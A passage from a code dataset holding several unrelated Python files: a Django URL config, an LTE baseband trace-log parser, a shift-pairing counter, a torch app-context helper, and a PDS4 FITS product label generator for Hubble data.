"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n \n #url(r'^add/$', views.add, name='add'),\n #url(r'^delete/(?P[-\\w])/$',views.delete,name='delete'),#?\n url(r'^taggit/tag/(?P[-\\w]+)/$', views.taggit, name='taggit_by_tag'),\n url(r'^$', views.source_list, name='source_list'),\n url(r'^(?P\\d+)/(?P[-\\w]+)/$', views.source_detail, name='source_detail'),\n\n\n ]\n", "sub_path": "bapalama/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "479311741", "text": "#coding:utf-8\n__author__ = \"Yulin Cui\"\n__version__ = \"1.0\"\n#to do list\n\"\"\"\n1. Add trouble shoot function, define a function, use this function to print different level of log printout.\n2. 
Convert one set of printout as data frame\n\"\"\"\n\n\nimport re\nimport sys\n#import simplejson\nimport json\nfrom tqdm import tqdm\n\n\ndef count_line(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n #print (\"method4 line number is: \" + str(i+1))\n return i + 1\n\n#if sys.argv[0] in dir():\n# try:\n# with open('C:/Users/eyulcui/Dropbox/LearnPython/raw_log/typical_trace.txt') as file:\n# input_file = file\n# pass\n# except IOError as e:\n# print (\"Unable to open file, file not exist\") #Does not exist OR no read permissions\n#else:\n# print(\"\\nUsage:\\nscan_baseband_traces_hs_ue.pl \\n\", end=\"\") #by default, print will change line, give change end symbol to none\n# print(\"\\nScript scans content of these traces for FOE:\\n\", end=\"\")\n# print(\"mtd peek -ta UpUlL1PeMasterFt -sig LPP_UP_ULL1PE_EI_DATA_IND\\n\", end=\"\")\n# print(\"lhsh gcpu00512 te e trace5 UpUlL1PeSlaveBl_Spucch\\n\", end=\"\")\n# print(\"\\n -b bbueref Search for a specific bbueref\", end=\"\")\n# print(\"\\n\", end=\"\")\n# sys.exit(0)\n\n\nstateMachine = [0,0,0]\n#[0] is search indication, others to be defined\ncurrentTiming = 0\nlastBFN = 0\nwrappedBfnSub = 0\ncurrentBFN = 0\ncurrentSF = 0\nfp = open('msg2.json', 'w')\n\nlogname = \"C:/Users/eyulcui/Dropbox/Python_CATM/capture_lienb2466.dec\"\nstart_line_number = 0\ntotal_line = count_line(logname)\n#keyMsg = \"UPC_DLMACCE_FI_SCHEDULE_RA_MSG2_REQ\"\n\n\nprint (\"Total line number for this log file is: \" + str(total_line) + \"\\n\", end=\"\")\nprint (\"bfn+sf;cellId;nrOfPreambles;bbueref;preambleId;timingOffset;preamblePower;freqOffEstPrach;\\n\", end=\"\")\n\nwith open(logname) as input_file:\n progress_bar_file = tqdm(input_file,total=total_line)\n#with open('C:/Users/eyulcui/Dropbox/LearnPython/raw_log/typical_trace.txt') as input_file:\n#with open('C:\\STUDY/Dropbox/LearnPython/raw_log/typical_trace.txt') as input_file:\n for eachLine in progress_bar_file:\n\n start_line_number += 1\n if \"LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND\" in eachLine:\n searchObj_Msg2 = re.compile(r'.*bfn:(\\d*).*sf:(\\d*).*LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND', re.M | re.I)\n\n if searchObj_Msg2.search(eachLine):\n currentBFN = int(searchObj_Msg2.search(eachLine).group(1))\n currentSF = int(searchObj_Msg2.search(eachLine).group(2))\n currentTiming = currentBFN*10 + currentSF\n if currentTiming + 20000 < lastBFN:\n wrappedBfnSub = wrappedBfnSub + 1\n lastBFN = currentTiming\n printBfnSub = wrappedBfnSub * 40960 + currentTiming\n stateMachine[0] = 1\n #print (printBfnSub)\n #print (searchObj.group(0))\n\n#Below are very bad example, very slow compare to above method, each regex rearch will cause around 2 seconds, well find function only need 0.2 second\n# searchObj_Msg2 = re.compile(r'.*bfn:(\\d*).*sf:(\\d*).*LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND', re.M | re.I)\n# if searchObj_Msg2.search(eachLine):\n# currentBFN = int(searchObj_Msg2.search(eachLine).group(1))\n# currentSF = int(searchObj_Msg2.search(eachLine).group(2))\n# currentTiming = currentBFN*10 + currentSF\n# if currentTiming + 20000 < lastBFN:\n# wrappedBfnSub = wrappedBfnSub + 1\n# lastBFN = currentTiming\n# printBfnSub = wrappedBfnSub * 40960 + currentTiming\n# stateMachine[0] = 1\n# #print (printBfnSub)\n# #print (searchObj.group(0))\n\n elif stateMachine[0] == 1:\n searchObj_Msg2_cellId = re.compile(r'.*cellId (\\S*),', re.M | re.I)\n searchObj_Msg2_nrOfPreambles = re.compile(r'.*nrOfPreambles (\\S*),', re.M | re.I)\n searchObj_Msg2_subframeRach = re.compile(r'.*subframeRach 
(\\S*),', re.M | re.I)\n searchObj_Msg2_sfnRach = re.compile(r'.*sfnRach (\\S*),', re.M | re.I)\n\n\n if searchObj_Msg2_cellId.search(eachLine):\n cellId = int(searchObj_Msg2_cellId.search(eachLine).group(1))\n stateMachine[1] = cellId\n\n elif searchObj_Msg2_nrOfPreambles.search(eachLine):\n nrOfPreambles = int(searchObj_Msg2_nrOfPreambles.search(eachLine).group(1))\n if nrOfPreambles > 0:\n stateMachine[2] = 1\n else:\n stateMachine = [0,0,0]\n\n elif searchObj_Msg2_subframeRach.search(eachLine):\n subframeRach = int(searchObj_Msg2_subframeRach.search(eachLine).group(1))\n\n elif searchObj_Msg2_sfnRach.search(eachLine):\n sfnRach = int(searchObj_Msg2_sfnRach.search(eachLine).group(1))\n\n\n if stateMachine[0] == 1 and stateMachine[2] ==1:\n searchObj_Msg2_bbUeRef = re.compile(r'.*bbUeRef (\\S*),', re.M | re.I)\n searchObj_Msg2_preambleId = re.compile(r'.*preambleId (\\S*),', re.M | re.I)\n searchObj_Msg2_timingOffset = re.compile(r'.*timingOffset (\\S*),', re.M | re.I)\n searchObj_Msg2_preamblePower = re.compile(r'.*preamblePower (\\S*),', re.M | re.I)\n searchObj_Msg2_freqOffEstPrach = re.compile(r'.*freqOffEstPrach (\\S*),', re.M | re.I)\n\n if searchObj_Msg2_bbUeRef.search(eachLine):\n bbUeRef = int(searchObj_Msg2_bbUeRef.search(eachLine).group(1))\n\n elif searchObj_Msg2_preambleId.search(eachLine):\n preambleId = int(searchObj_Msg2_preambleId.search(eachLine).group(1))\n\n elif searchObj_Msg2_timingOffset.search(eachLine):\n timingOffset = int(searchObj_Msg2_timingOffset.search(eachLine).group(1))\n\n elif searchObj_Msg2_preamblePower.search(eachLine):\n preamblePower = int(searchObj_Msg2_preamblePower.search(eachLine).group(1))\n\n elif searchObj_Msg2_freqOffEstPrach.search(eachLine):\n freqOffEstPrach = int(searchObj_Msg2_freqOffEstPrach.search(eachLine).group(1))\n stateMachine = [0,0,0]\n msg2_output = [printBfnSub,cellId,nrOfPreambles,preambleId,timingOffset,preamblePower,freqOffEstPrach]\n json.dump(msg2_output, fp)\n print (str(printBfnSub) + \";\" + str(cellId) + \";\" + str(nrOfPreambles) + \";\" + str(preambleId) + \";\" + str(timingOffset) + \";\" + str(preamblePower) + \";\" + str(freqOffEstPrach) + \";\" + \"\\n\", end=\"\")\n\n\n\n\n\n# print (\"searchObj.group() : \", searchObj.group())\n# print (\"searchObj.group(1) : \", searchObj.group(1))\n# print (\"searchObj.group(2) : \", searchObj.group(2))\n# else:\n# print (\"Nothing found!!\")\n\n\n#[2016-12-01 12:51:54.682170] 0xc5021225=(bfn:3152, sfn:80, sf:2.20, bf:34) duId:1 EMCA1/UpUlCellPeMasterFt_MTD BIN_SEND : LPP_UP_ULCELLPE_CI_SCHEDULE_RA_RESPONSE_IND (775) <= UNKNOWN (sessionRef=0x4)\n#UpUlCellPeCiScheduleRaResponseInd {\n# sigNo 4294901760,\n# cellId 4,\n# subframeRach 1,\n# sfnRach 80,\n# nrOfPreambles 1,\n# padding0 0,\n# rachPreambleArray {\n# rachPreambleArray {\n# preambleId 0,\n# timingOffset 1,\n# preamblePower 4675,\n# sectorId 0,\n# freqOffEstPrach 0,\n# prachCeLevel 1\n# }\n# }\n#}\n\n", "sub_path": "collection/BB_trace_handling_catm.py", "file_name": "BB_trace_handling_catm.py", "file_ext": "py", "file_size_in_byte": 7438, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tqdm.tqdm", "line_number": 61, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 68, "usage_type": "call"}, {"api_name": "re.M", "line_number": 68, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 68, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 97, "usage_type": "call"}, {"api_name": "re.M", 
"line_number": 97, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 97, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 98, "usage_type": "call"}, {"api_name": "re.M", "line_number": 98, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 98, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 99, "usage_type": "call"}, {"api_name": "re.M", "line_number": 99, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 99, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "re.M", "line_number": 100, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 100, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 122, "usage_type": "call"}, {"api_name": "re.M", "line_number": 122, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 122, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 123, "usage_type": "call"}, {"api_name": "re.M", "line_number": 123, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 123, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 124, "usage_type": "call"}, {"api_name": "re.M", "line_number": 124, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 124, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 125, "usage_type": "call"}, {"api_name": "re.M", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 125, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 126, "usage_type": "call"}, {"api_name": "re.M", "line_number": 126, "usage_type": "attribute"}, {"api_name": "re.I", "line_number": 126, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 144, "usage_type": "call"}]} +{"seq_id": "399294989", "text": "from itertools import combinations, chain\nfrom collections import Counter\n\ndef generation_list(total_person):\n \"\"\"Создает список человек\"\"\"\n return [x + 1 for x in range(total_person)]\n\ndef count_elements(general_list, list_of_elements):\n \"\"\"Считает количество переданных элементов в списке\"\"\"\n count = Counter(general_list)\n res = {i: count[i] for i in list_of_elements}\n return res\n\ndef paring(roll, count_in_pair = 2):\n \"\"\"Составляет все пары для списка\n (также можно использовать для генерации любых других\n сочетаний указ��вая второй параметр)\"\"\"\n return list(combinations(roll, count_in_pair))\n\ndef find_pairs(schedule):\n \"\"\"Функция составляет пары для каждой смены в переданном расписании\"\"\"\n return [paring(shift) for shift in schedule]\n\ndef concatenate_lists(lists):\n \"\"\"Функция сцкпляет несколько списков в один\"\"\"\n return list(chain(*lists))\n\nif __name__ == '__main__':\n \"\"\"Исключительно для теста модуля\"\"\"\n schedule = [\n (1, 2, 3, 6, 7, 8),\n (1, 2, 4, 5, 7, 9),\n (1, 3, 5, 6, 9, 10),\n (2, 4, 6, 7, 8, 10),\n (3, 4, 5, 6, 8, 9)]\n # Общее кол-во людей\n number_of_people = 10\n # Кол-во людей в смене\n people_in_shift = 6\n # Список ID охранников\n list_people = generation_list(number_of_people)\n # Все возможные смены\n all_shifts = paring(list_people, people_in_shift)\n # Все пары\n all_pairs = paring(list_people)\n # Пары для каждой смены\n couples_in_shifts = find_pairs(schedule)\n # Количество встреч каждой из пар в расписании\n number_of_meetings = count_elements(concatenate_lists(couples_in_shifts), all_pairs)\n\n print(\n f'number_of_people:{number_of_people}\\n'\n 
f'people_in_shift:{people_in_shift}\\n'\n f'list_people:{list_people}\\n'\n f'schedule:{schedule}\\n'\n # f'couples_in_shifts:{couples_in_shifts}\\n'\n # f'all_shifts:{all_shifts}\\n'\n # f'all_pairs:{all_pairs}\\n'\n f'number_of_meetings:{number_of_meetings}\\n'\n )\n", "sub_path": "Test and create new functions/Схема/functions_for_shifts.py", "file_name": "functions_for_shifts.py", "file_ext": "py", "file_size_in_byte": 2394, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.Counter", "line_number": 10, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 18, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "231038576", "text": "import logging\nimport torch as t\n\nfrom singleton_decorator import singleton\nfrom main.common.configuration import Configuration\nfrom main.common.logger import Logger\n\n\nctx = globals()\n\n@singleton\nclass AppContext(object):\n\n def __init__(self, conf_file=None):\n if conf_file is None:\n conf_file = 'main/conf/config.yml'\n\n self.conf = Configuration(conf_file)\n\n if self.conf.get('logging:enable') is True:\n log_dir = self.conf.get('logging:conf-file', 'main/conf/logging.yml')\n Logger(log_dir)\n else:\n logging.basicConfig(level=logging.DEBUG)\n\n ctx['conf'] = self.conf\n\ndef cuda(tensor, device=None):\n if device is None:\n device = ctx['conf'].get('device')\n if device is None:\n device = t.device('cuda' if t.cuda.is_available() else 'cpu')\n else:\n device = t.device(device)\n\n return tensor.to(device)\n\ndef logger(self):\n return logging.getLogger(self.__class__.__name__)\n\ndef conf(key=None, default=None):\n if key is None:\n return ctx['conf']\n return ctx['conf'].get(key, default)\n", "sub_path": "main/common/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 1126, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "main.common.configuration.Configuration", "line_number": 18, "usage_type": "call"}, {"api_name": "main.common.logger.Logger", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 24, "usage_type": "attribute"}, {"api_name": "singleton_decorator.singleton", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "569018351", "text": "\"\"\"\nFunctionality to create a label for a data product containing a single\nFITS file.\n\"\"\"\nfrom typing import Any, Dict, Generator, List, Optional, Tuple, cast\nimport os.path\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom pdart.db.bundle_db import BundleDB\nfrom pdart.db.sql_alch_tables import File, OtherCollection\nfrom pdart.labels.file_contents import get_file_contents\nfrom pdart.labels.lookup import (\n CARD_SET,\n DictLookup,\n Lookup,\n MultiDictLookup,\n make_hdu_lookups,\n)\nfrom pdart.labels.fits_product_label_xml import (\n make_data_label,\n make_misc_label,\n mk_Investigation_Area_lidvid,\n mk_Investigation_Area_name,\n)\nfrom 
pdart.labels.hst_parameters import (\n get_channel_id,\n get_hst_parameters,\n get_start_stop_date_times,\n get_exposure_duration,\n get_instrument_id,\n get_detector_ids,\n get_filter_name,\n)\nfrom pdart.labels.label_error import LabelError\nfrom pdart.labels.observing_system import (\n instrument_host_lidvid,\n observing_system,\n observing_system_lid,\n observing_system_lidvid,\n)\nfrom pdart.labels.investigation_area import investigation_area\nfrom pdart.labels.primary_result_summary import primary_result_summary\nfrom pdart.labels.target_identification import (\n get_target,\n get_target_info,\n create_target_identification_nodes,\n)\nfrom pdart.labels.target_identification_xml import get_target_lid\nfrom pdart.labels.doc_reference_list import make_document_reference_list\n\nfrom pdart.pipeline.suffix_info import ( # type: ignore\n get_titles_format,\n get_ref_suffix,\n TARGET_IDENTIFICATION_SUFFIXES,\n)\n\nfrom pdart.labels.time_coordinates import get_time_coordinates\nfrom pdart.labels.utils import (\n lidvid_to_lid,\n lidvid_to_vid,\n get_current_date,\n MOD_DATE_FOR_TESTESING,\n wavelength_from_range,\n)\nfrom pdart.pds4.lid import LID\nfrom pdart.pds4.lidvid import LIDVID\nfrom pdart.pds4.vid import VID\nfrom pdart.xml.pretty import pretty_and_verify\nfrom pdart.xml.templates import (\n combine_nodes_into_fragment,\n NodeBuilder,\n)\n\nfrom pdart.pipeline.suffix_info import ( # type: ignore\n get_collection_type,\n get_processing_level,\n)\n\nfrom wavelength_ranges import wavelength_ranges # type: ignore\n\n\ndef _directory_siblings(\n working_dir: str, bundle_db: BundleDB, product_lidvid: str\n) -> List[str]:\n # Look in the mastDownload directory and search for the file with\n # the product_lidvid's basename. Then return all its siblings'\n # basenames.\n for dirpath, dirnames, filenames in os.walk(\n os.path.join(working_dir, \"mastDownload\")\n ):\n basename = bundle_db.get_product_file(product_lidvid).basename\n if basename in filenames:\n return sorted(filenames)\n return []\n\n\ndef _raw_sibling_file(siblings: List[str]) -> Tuple[str, str]:\n for suffix in get_ref_suffix():\n sib_file = _sibling_file(siblings, suffix)\n if sib_file:\n return (suffix, sib_file)\n # if the main reference file doesn't exist, we check for alternate\n # reference file and also make sure the ninth character of the basename\n # is between 0~9 when using using alternate reference file.\n for suffix in get_ref_suffix(alt_ref=True):\n sib_file = _sibling_file(siblings, suffix)\n if sib_file:\n return (suffix, sib_file)\n raise RuntimeError(\n f\"Cannot get the reference files. 
Siblings={siblings};\"\n + f\"REF_SUFFIXES={get_ref_suffix()};\"\n + f\"ALT_REF_SUFFIXES={get_ref_suffix(alt_ref=True)}\"\n )\n\n\ndef _shm_sibling_file(siblings: List[str]) -> Tuple[str, str]:\n for suffix in TARGET_IDENTIFICATION_SUFFIXES:\n sib_file = _sibling_file(siblings, suffix)\n if sib_file:\n return (suffix, sib_file)\n raise RuntimeError(\n f\"siblings={siblings}; SHM_SUFFIXES={TARGET_IDENTIFICATION_SUFFIXES}\"\n )\n\n\ndef _sibling_file(\n siblings: List[str], suffix: str, alt_ref: bool = False\n) -> Optional[str]:\n # Given a list of siblings, return the first one that ends with\n # \"_.fits\".\n ending = f\"_{suffix.lower()}.fits\"\n for basename in siblings:\n if alt_ref:\n ninth_char = basename[basename.rindex(\"_\") - 1]\n if int(ninth_char) not in range(0, 10):\n continue\n if basename.lower().endswith(ending):\n return basename\n return None\n\n\ndef _munge_lidvid(product_lidvid: str, suffix: str, new_basename: str) -> str:\n bundle_id, collection_id, product_id = LIDVID(product_lidvid).lid().parts()\n\n # TODO This is a hack\n collection_type = get_collection_type(suffix=suffix)\n first_underscore_idx = collection_id.index(\"_\")\n new_collection_id = (\n collection_type + collection_id[first_underscore_idx:-3] + suffix.lower()\n )\n # TODO This is a hack\n new_product_id = new_basename[0:9]\n\n new_lid = LID.create_from_parts([bundle_id, new_collection_id, new_product_id])\n # TODO This is a hack. Fix it.\n vid = VID(\"1.0\")\n new_lidvid = LIDVID.create_from_lid_and_vid(new_lid, vid)\n return str(new_lidvid)\n\n\ndef _find_RAWish_lookups(\n bundle_db: BundleDB, product_lidvid: str, file_basename: str, siblings: List[str]\n) -> List[Lookup]:\n # TODO Fix this\n def _find_RAWish_suffix_and_basename() -> Tuple[str, str]:\n return _raw_sibling_file(siblings)\n\n suffix, RAWish_basename = _find_RAWish_suffix_and_basename()\n RAWish_product_lidvid = _munge_lidvid(product_lidvid, suffix, RAWish_basename)\n\n def _find_RAWish_card_dicts() -> CARD_SET:\n card_dicts = bundle_db.get_card_dictionaries(\n RAWish_product_lidvid, RAWish_basename\n )\n return card_dicts\n\n card_dicts = _find_RAWish_card_dicts()\n return make_hdu_lookups(RAWish_basename, card_dicts)\n\n\ndef _find_SHMish_lookup(\n bundle_db: BundleDB, product_lidvid: str, file_basename: str, siblings: List[str]\n) -> Lookup:\n # TODO Fix this\n def _find_SHMish_suffix_and_basename() -> Tuple[str, str]:\n return _shm_sibling_file(siblings)\n\n suffix, SHMish_basename = _find_SHMish_suffix_and_basename()\n SHMish_product_lidvid = _munge_lidvid(product_lidvid, suffix, SHMish_basename)\n\n def _find_SHMish_card_dicts() -> CARD_SET:\n card_dicts = bundle_db.get_card_dictionaries(\n SHMish_product_lidvid, SHMish_basename\n )\n return card_dicts\n\n card_dicts = _find_SHMish_card_dicts()\n return DictLookup(SHMish_basename, card_dicts)\n\n\ndef make_fits_product_label(\n working_dir: str,\n bundle_db: BundleDB,\n collection_lidvid: str,\n product_lidvid: str,\n bundle_lidvid: str,\n file_basename: str,\n verify: bool,\n use_mod_date_for_testing: bool = False,\n) -> bytes:\n try:\n product = bundle_db.get_product(product_lidvid)\n collection = bundle_db.get_collection(collection_lidvid)\n if not isinstance(collection, OtherCollection):\n raise TypeError(f\"{collection} is not OtherCollection.\")\n instrument = collection.instrument\n suffix = collection.suffix\n\n # If a label is created for testing purpose to compare with pre-made XML\n # we will use MOD_DATE_FOR_TESTESING as the modification date.\n if not 
use_mod_date_for_testing:\n # Get the date when the label is created\n mod_date = get_current_date()\n else:\n mod_date = MOD_DATE_FOR_TESTESING\n\n card_dicts = bundle_db.get_card_dictionaries(product_lidvid, file_basename)\n lookup = DictLookup(file_basename, card_dicts)\n siblings = _directory_siblings(working_dir, bundle_db, product_lidvid)\n hdu_lookups = _find_RAWish_lookups(\n bundle_db, product_lidvid, file_basename, siblings\n )\n shm_lookup = _find_SHMish_lookup(\n bundle_db, product_lidvid, file_basename, siblings\n )\n\n start_date_time, stop_date_time = get_start_stop_date_times(\n hdu_lookups, shm_lookup\n )\n exposure_duration = get_exposure_duration(hdu_lookups, shm_lookup)\n start_stop_times = {\n \"start_date_time\": start_date_time,\n \"stop_date_time\": stop_date_time,\n \"exposure_duration\": exposure_duration,\n }\n\n # Store start/stop time for each fits_product in fits_products table.\n # The min/max will be pulled out for roll-up in data collection/bundle.\n bundle_db.update_fits_product_time(\n product_lidvid, start_date_time, stop_date_time\n )\n\n hst_parameters = get_hst_parameters(hdu_lookups, shm_lookup)\n bundle = bundle_db.get_bundle(bundle_lidvid)\n proposal_id = bundle.proposal_id\n\n investigation_area_name = mk_Investigation_Area_name(proposal_id)\n investigation_area_lidvid = mk_Investigation_Area_lidvid(proposal_id)\n bundle_db.create_context_product(investigation_area_lidvid, \"investigation\")\n bundle_db.create_context_product(instrument_host_lidvid(), \"instrument_host\")\n bundle_db.create_context_product(\n observing_system_lidvid(instrument), \"instrument\"\n )\n\n # Fetch target identifications from db\n target_id = shm_lookup[\"TARG_ID\"]\n target_identifications = bundle_db.get_target_identifications_based_on_id(\n target_id\n )\n\n # At this stage, target identifications should be in the db\n if len(target_identifications) == 0:\n raise ValueError(\"Target identification is not stored in db.\")\n\n target_identification_nodes: List[NodeBuilder] = []\n target_identification_nodes = create_target_identification_nodes(\n bundle_db, target_identifications, \"data\"\n )\n\n # Get wavelength\n instrument_id = get_instrument_id(hdu_lookups, shm_lookup)\n detector_ids = get_detector_ids(hdu_lookups, shm_lookup)\n filter_name = get_filter_name(hdu_lookups, shm_lookup)\n wavelength_range = wavelength_ranges(instrument_id, detector_ids, filter_name)\n bundle_db.update_wavelength_range(product_lidvid, wavelength_range)\n\n # Get title\n channel_id = get_channel_id(hdu_lookups, shm_lookup)\n try:\n titles = get_titles_format(instrument_id, channel_id, suffix)\n product_title = titles[0] + \".\"\n product_title = product_title.format(\n I=instrument_id + \"/\" + channel_id, F=file_basename, P=proposal_id\n )\n collection_title = titles[1] + \".\"\n collection_title = collection_title.format(\n I=instrument_id + \"/\" + channel_id, F=file_basename, P=proposal_id\n )\n # save data/misc collection title to OtherCollection table\n bundle_db.update_fits_product_collection_title(\n collection_lidvid, collection_title\n )\n except KeyError:\n # If product_title doesn't exist in SUFFIX_TITLES, we use the\n # following text as the product_title.\n product_title = (\n f\"{instrument_id} data file {file_basename} \"\n + f\"obtained by the HST Observing Program {proposal_id}.\"\n )\n\n # Dictionary used for primary result summary\n processing_level = get_processing_level(suffix, instrument_id, channel_id)\n primary_result_dict: Dict[str, Any] = {}\n 
primary_result_dict[\"processing_level\"] = processing_level\n primary_result_dict[\"description\"] = product_title\n primary_result_dict[\"wavelength_range\"] = wavelength_range\n\n # Dictionary passed into templates. Use the same data dictionary for\n # either data label template or misc label template\n data_dict = {\n \"lid\": lidvid_to_lid(product_lidvid),\n \"vid\": lidvid_to_vid(product_lidvid),\n \"title\": product_title,\n \"mod_date\": mod_date,\n \"file_name\": file_basename,\n \"file_contents\": get_file_contents(\n bundle_db, card_dicts, instrument, product_lidvid\n ),\n \"Investigation_Area\": investigation_area(\n investigation_area_name, investigation_area_lidvid, \"data\"\n ),\n \"Observing_System\": observing_system(instrument),\n \"Time_Coordinates\": get_time_coordinates(start_stop_times),\n \"Target_Identification\": combine_nodes_into_fragment(\n target_identification_nodes\n ),\n \"HST\": hst_parameters,\n \"Primary_Result_Summary\": primary_result_summary(primary_result_dict),\n \"Reference_List\": make_document_reference_list([instrument], \"data\"),\n }\n\n # Pass the data_dict to either data label or misc label based on\n # collection_type\n collection_type = get_collection_type(suffix, instrument_id, channel_id)\n if collection_type == \"data\":\n label = make_data_label(data_dict).toxml().encode()\n elif collection_type == \"miscellaneous\":\n label = make_misc_label(data_dict).toxml().encode()\n\n except AssertionError:\n raise AssertionError(\n f\"{product_lidvid} has no target identifications stored in DB.\"\n )\n except Exception as e:\n print(str(e))\n raise LabelError(\n product_lidvid, file_basename, (lookup, hdu_lookups[0], shm_lookup)\n ) from e\n\n return pretty_and_verify(label, verify)\n", "sub_path": "pdart/labels/fits_product_label.py", "file_name": "fits_product_label.py", "file_ext": "py", "file_size_in_byte": 13415, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 83, "usage_type": "name"}, {"api_name": "os.path.walk", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 89, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 97, "usage_type": "name"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 98, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 105, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 111, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_ref_suffix", "line_number": 112, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 116, "usage_type": "name"}, {"api_name": "pdart.pipeline.suffix_info.TARGET_IDENTIFICATION_SUFFIXES", "line_number": 117, "usage_type": "name"}, {"api_name": "pdart.pipeline.suffix_info.TARGET_IDENTIFICATION_SUFFIXES", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 
128, "usage_type": "name"}, {"api_name": "pdart.pds4.lidvid.LIDVID", "line_number": 143, "usage_type": "call"}, {"api_name": "pdart.pipeline.suffix_info.get_collection_type", "line_number": 146, "usage_type": "call"}, {"api_name": "pdart.pds4.lid.LID.create_from_parts", "line_number": 154, "usage_type": "call"}, {"api_name": "pdart.pds4.lid.LID", "line_number": 154, "usage_type": "name"}, {"api_name": "pdart.pds4.vid.VID", "line_number": 156, "usage_type": "call"}, {"api_name": "pdart.pds4.lidvid.LIDVID.create_from_lid_and_vid", "line_number": 157, "usage_type": "call"}, {"api_name": "pdart.pds4.lidvid.LIDVID", "line_number": 157, "usage_type": "name"}, {"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 162, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 165, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.CARD_SET", "line_number": 171, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.make_hdu_lookups", "line_number": 178, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 163, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.Lookup", "line_number": 163, "usage_type": "name"}, {"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 182, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 185, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.CARD_SET", "line_number": 191, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.DictLookup", "line_number": 198, "usage_type": "call"}, {"api_name": "pdart.labels.lookup.Lookup", "line_number": 183, "usage_type": "name"}, {"api_name": "pdart.db.bundle_db.BundleDB", "line_number": 203, "usage_type": "name"}, {"api_name": "pdart.db.sql_alch_tables.OtherCollection", "line_number": 214, "usage_type": "argument"}, {"api_name": "pdart.labels.utils.get_current_date", "line_number": 223, "usage_type": "call"}, {"api_name": "pdart.labels.utils.MOD_DATE_FOR_TESTESING", "line_number": 225, "usage_type": "name"}, {"api_name": "pdart.labels.lookup.DictLookup", "line_number": 228, "usage_type": "call"}, {"api_name": "pdart.labels.hst_parameters.get_start_stop_date_times", "line_number": 237, "usage_type": "call"}, 